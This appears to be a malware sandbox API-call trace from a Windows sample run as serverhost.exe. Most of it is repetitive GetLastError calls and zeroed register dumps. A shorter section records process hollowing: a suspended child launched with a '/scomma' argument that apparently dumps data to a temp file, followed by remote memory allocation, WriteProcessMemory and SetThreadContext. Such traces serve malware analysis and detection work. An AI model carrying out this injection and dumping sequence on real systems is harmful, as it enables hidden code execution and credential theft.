GetLastError () returned 0x0 [0083.852] GetLastError () returned 0x0 [0083.852] GetLastError () returned 0x0 [0083.852] GetLastError () returned 0x0 [0083.852] GetLastError () returned 0x0 [0083.852] GetLastError () returned 0x0 [0083.852] GetLastError () returned 0x0 [0083.852] GetLastError () returned 0x0 [0083.852] GetLastError () returned 0x0 [0083.852] GetLastError () returned 0x0 [0083.852] GetLastError () returned 0x0 [0083.852] GetLastError () returned 0x0 [0083.852] GetLastError () returned 0x0 [0083.852] GetLastError () returned 0x0 [0083.852] GetLastError () returned 0x0 [0083.852] GetLastError () returned 0x0 [0083.852] GetLastError () returned 0x0 [0083.852] GetLastError () returned 0x0 [0083.852] GetLastError () returned 0x0 [0083.852] GetLastError () returned 0x0 [0083.852] GetLastError () returned 0x0 [0083.853] GetLastError () returned 0x0 [0083.853] GetLastError () returned 0x0 [0083.853] GetLastError () returned 0x0 [0083.853] GetLastError () returned 0x0 [0083.853] GetLastError () returned 0x0 [0083.853] GetLastError () returned 0x0 [0083.853] GetLastError () returned 0x0 [0083.853] GetLastError () returned 0x0 [0083.853] GetLastError () returned 0x0 [0083.853] GetLastError () returned 0x0 [0083.853] GetLastError () returned 0x0 [0083.853] GetLastError () returned 0x0 [0083.853] GetLastError () returned 0x0 [0083.853] GetLastError () returned 0x0 [0083.853] GetLastError () returned 0x0 [0083.853] GetLastError () returned 0x0 [0083.853] GetLastError () returned 0x0 [0083.853] GetLastError () returned 0x0 [0083.853] GetLastError () returned 0x0 [0083.853] GetLastError () returned 0x0 [0083.853] GetLastError () returned 0x0 [0083.853] GetLastError () returned 0x0 [0083.853] GetLastError () returned 0x0 [0083.853] GetLastError () returned 0x0 [0083.853] GetLastError () returned 0x0 [0083.853] GetLastError () returned 0x0 [0083.853] GetLastError () returned 0x0 [0083.853] GetLastError () returned 0x0 [0083.853] GetLastError () returned 0x0 [0083.853] GetLastError () returned 0x0 [0083.853] GetLastError () returned 0x0 [0083.853] GetLastError () returned 0x0 [0083.853] GetLastError () returned 0x0 [0083.853] GetLastError () returned 0x0 [0083.853] GetLastError () returned 0x0 [0083.853] GetLastError () returned 0x0 [0083.853] GetLastError () returned 0x0 [0083.853] GetLastError () returned 0x0 [0083.853] GetLastError () returned 0x0 [0083.853] GetLastError () returned 0x0 [0083.853] GetLastError () returned 0x0 [0083.853] GetLastError () returned 0x0 [0083.853] GetLastError () returned 0x0 [0083.853] GetLastError () returned 0x0 [0083.853] GetLastError () returned 0x0 [0083.853] GetLastError () returned 0x0 [0083.853] GetLastError () returned 0x0 [0083.853] GetLastError () returned 0x0 [0083.853] GetLastError () returned 0x0 [0083.853] GetLastError () returned 0x0 [0083.853] GetLastError () returned 0x0 [0083.853] GetLastError () returned 0x0 [0083.853] GetLastError () returned 0x0 [0083.853] GetLastError () returned 0x0 [0083.853] GetLastError () returned 0x0 [0083.853] GetLastError () returned 0x0 [0083.853] GetLastError () returned 0x0 [0083.853] GetLastError () returned 0x0 [0083.853] GetLastError () returned 0x0 [0083.853] GetLastError () returned 0x0 [0083.853] GetLastError () returned 0x0 [0083.853] GetLastError () returned 0x0 [0083.853] GetLastError () returned 0x0 [0083.854] GetLastError () returned 0x0 [0083.854] GetLastError () returned 0x0 [0083.854] GetLastError () returned 0x0 [0083.854] GetLastError () returned 0x0 [0083.854] GetLastError () returned 0x0 [0083.854] GetLastError () returned 0x0 [0083.854] GetLastError () returned 0x0 [0083.854] GetLastError () returned 0x0 [0083.854] GetLastError () returned 0x0 [0083.854] GetLastError () returned 0x0 [0083.854] GetLastError () returned 0x0 [0083.854] GetLastError () returned 0x0 [0083.854] GetLastError () returned 0x0 [0083.854] GetLastError () returned 0x0 [0083.854] GetLastError () returned 0x0 [0083.854] GetLastError () returned 0x0 [0083.854] GetLastError () returned 0x0 [0083.854] GetLastError () returned 0x0 [0083.854] GetLastError () returned 0x0 [0083.854] GetLastError () returned 0x0 [0083.854] GetLastError () returned 0x0 [0083.854] GetLastError () returned 0x0 [0083.854] GetLastError () returned 0x0 [0083.854] GetLastError () returned 0x0 [0083.854] GetLastError () returned 0x0 [0083.854] GetLastError () returned 0x0 [0083.854] GetLastError () returned 0x0 [0083.854] GetLastError () returned 0x0 [0083.854] GetLastError () returned 0x0 [0083.854] GetLastError () returned 0x0 [0083.854] GetLastError () returned 0x0 [0083.854] GetLastError () returned 0x0 [0083.854] GetLastError () returned 0x0 [0083.854] GetLastError () returned 0x0 [0083.854] GetLastError () returned 0x0 [0083.854] GetLastError () returned 0x0 [0083.854] GetLastError () returned 0x0 [0083.854] GetLastError () returned 0x0 [0083.854] GetLastError () returned 0x0 [0083.854] GetLastError () returned 0x0 [0083.854] GetLastError () returned 0x0 [0083.854] GetLastError () returned 0x0 [0083.854] GetLastError () returned 0x0 [0083.854] GetLastError () returned 0x0 [0083.854] GetLastError () returned 0x0 [0083.854] GetLastError () returned 0x0 [0083.854] GetLastError () returned 0x0 [0083.854] GetLastError () returned 0x0 [0083.854] GetLastError () returned 0x0 [0083.854] GetLastError () returned 0x0 [0083.854] GetLastError () returned 0x0 [0083.854] GetLastError () returned 0x0 [0083.854] GetLastError () returned 0x0 [0083.854] GetLastError () returned 0x0 [0083.854] GetLastError () returned 0x0 [0083.854] GetLastError () returned 0x0 [0083.854] GetLastError () returned 0x0 [0083.854] GetLastError () returned 0x0 [0083.854] GetLastError () returned 0x0 [0083.854] GetLastError () returned 0x0 [0083.854] GetLastError () returned 0x0 [0083.854] GetLastError () returned 0x0 [0083.854] GetLastError () returned 0x0 [0083.855] GetLastError () returned 0x0 [0083.855] GetLastError () returned 0x0 [0083.855] GetLastError () returned 0x0 [0083.855] GetLastError () returned 0x0 [0083.855] GetLastError () returned 0x0 [0083.855] GetLastError () returned 0x0 [0083.855] GetLastError () returned 0x0 [0083.855] GetLastError () returned 0x0 [0083.855] GetLastError () returned 0x0 [0083.855] GetLastError () returned 0x0 [0083.855] GetLastError () returned 0x0 [0083.855] GetLastError () returned 0x0 [0083.855] GetLastError () returned 0x0 [0083.855] GetLastError () returned 0x0 [0083.855] GetLastError () returned 0x0 [0083.855] GetLastError () returned 0x0 [0083.855] GetLastError () returned 0x0 [0083.855] GetLastError () returned 0x0 [0083.855] GetLastError () returned 0x0 [0083.855] GetLastError () returned 0x0 [0083.855] GetLastError () returned 0x0 [0083.855] GetLastError () returned 0x0 [0083.855] GetLastError () returned 0x0 [0083.855] GetLastError () returned 0x0 [0083.855] GetLastError () returned 0x0 [0083.855] GetLastError () returned 0x0 [0083.855] GetLastError () returned 0x0 [0083.855] GetLastError () returned 0x0 [0083.855] GetLastError () returned 0x0 [0083.855] GetLastError () returned 0x0 [0083.855] GetLastError () returned 0x0 [0084.102] GetTickCount () returned 0x1c84d [0084.373] GetTickCount () returned 0x1c966 [0084.373] GetTickCount () returned 0x1c966 [0084.373] GetTickCount () returned 0x1c966 [0084.451] GetTickCount () returned 0x1c9b4 [0084.576] GetTickCount () returned 0x1ca31 [0085.371] GetTickCount () returned 0x1cd4c [0085.372] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1a9f8a0, nSize=0x104 | out: lpFilename="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\serverhost.exe")) returned 0x47 [0085.372] _snwprintf (in: _Dest=0x1a9f698, _Count=0x104, _Format="\"%s\" /scomma \"%s\"" | out: _Dest="\"C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe\" /scomma \"C:\\ProgramData\\C570.tmp\"") returned 107 [0085.372] VirtualAlloc (lpAddress=0x0, dwSize=0x1c000, flAllocationType=0x3000, flProtect=0x4) returned 0x2150000 [0085.373] WTSGetActiveConsoleSessionId () returned 0x1 [0085.374] WTSQueryUserToken (SessionId=0x1, phToken=0x1a9fac4*=0x1cfb118) returned 0 [0085.374] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe\" /scomma \"C:\\ProgramData\\C570.tmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x1a9f630*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1a9faac | out: lpCommandLine="\"C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe\" /scomma \"C:\\ProgramData\\C570.tmp\"", lpProcessInformation=0x1a9faac*(hProcess=0x3d0, hThread=0x3cc, dwProcessId=0xc50, dwThreadId=0xc54)) returned 1 [0085.376] VirtualQueryEx (in: hProcess=0x3d0, lpAddress=0x400000, lpBuffer=0x1a9f654, dwLength=0x1c | out: lpBuffer=0x1a9f654*(BaseAddress=0x400000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x840000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0085.376] VirtualAllocEx (hProcess=0x3d0, lpAddress=0x400000, dwSize=0x1c000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000 [0085.381] GetThreadContext (in: hThread=0x3cc, lpContext=0x1a9f388 | out: lpContext=0x1a9f388*(ContextFlags=0x10002, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x0, SegEs=0x0, SegDs=0x0, Edi=0x0, Esi=0x0, Ebx=0x7ffdf000, Edx=0x0, Ecx=0x0, Eax=0xc41d90, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0085.381] IsWow64Process (in: hProcess=0x3d0, Wow64Process=0x1a9f674 | out: Wow64Process=0x1a9f674) returned 1 [0085.381] WriteProcessMemory (in: hProcess=0x3d0, lpBaseAddress=0x400000, lpBuffer=0x2150000*, nSize=0x1c000, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2150000*, lpNumberOfBytesWritten=0x0) returned 1 [0085.384] WriteProcessMemory (in: hProcess=0x3d0, lpBaseAddress=0x7ffdf008, lpBuffer=0x1a9f678*, nSize=0x4, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x1a9f678*, lpNumberOfBytesWritten=0x0) returned 1 [0085.384] SetThreadContext (hThread=0x3cc, lpContext=0x1a9f388*(ContextFlags=0x10002, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x0, SegEs=0x0, SegDs=0x0, Edi=0x0, Esi=0x0, Ebx=0x7ffdf000, Edx=0x0, Ecx=0x0, Eax=0x41211a, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, 